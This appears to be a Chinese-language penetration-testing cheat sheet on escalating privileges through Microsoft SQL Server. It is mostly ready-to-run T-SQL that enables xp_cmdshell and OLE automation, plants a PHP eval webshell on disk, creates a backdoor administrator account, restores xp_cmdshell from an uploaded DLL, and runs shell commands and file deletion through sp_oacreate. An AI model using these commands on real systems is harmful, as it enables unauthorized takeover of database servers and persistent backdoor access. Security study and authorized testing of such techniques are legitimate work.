MSSQL提权

xp_cmdshell提权

sql server 数据库可以通过xp_cmdshell组件执行一些系统命令
默认情况下xp_cmdshell是关闭的

开启xp_cmdshell

EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
GO

xp_cmdshell为高级选项，默认不允许编辑

开启允许编辑高级选项

EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO

再次运行开启xp_cmdshell的命令即可

关闭xp_cmdshell

EXEC sp_configure 'show advanced options', 0
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',0
RECONFIGURE;

通过xp_cmdshell执行系统命令

写入一句话木马
exec master..xp_cmdshell "echo ^<?php eval($_POST['cmd'])?^> > D:\\cmd.php"

提权

exec master..xp_cmdshell 'net user xutest 123456 /add'
exec master..xp_cmdshell 'net localgroup administrators xutest /add'

恢复

如果xp_cmdshell被删除，可以尝试上传xplog70.dll进行恢复，恢复语句：
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll'

sp_oacreate提权

开启sp_oacreate

开启

exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'ole automation procedures',1;reconfigure;

关闭

exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'ole automation procedures',0;reconfigure;
exec sp_configure 'show advanced options',0;reconfigure;

执行命令

该方法是无回显的
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >d:\\temp\\1.txt'
对文件的处理
删除文件

declare @result int
declare @fso_token int
exec sp_oacreate 'scripting.filesystemobject', @fso_token out
exec sp_oamethod @fso_token,'deletefile',null,'c:\1.txt'
exec sp_oadestroy @fso_token

复制文件

declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'copyfile',null,'c:\1.txt','c:\2.txt'  #‘movedile’移动文件

参考文章：
https://www.jianshu.com/p/85db175a05e3
https://www.jianshu.com/p/027636ef4640
https://www.jianshu.com/p/e79d2a42338b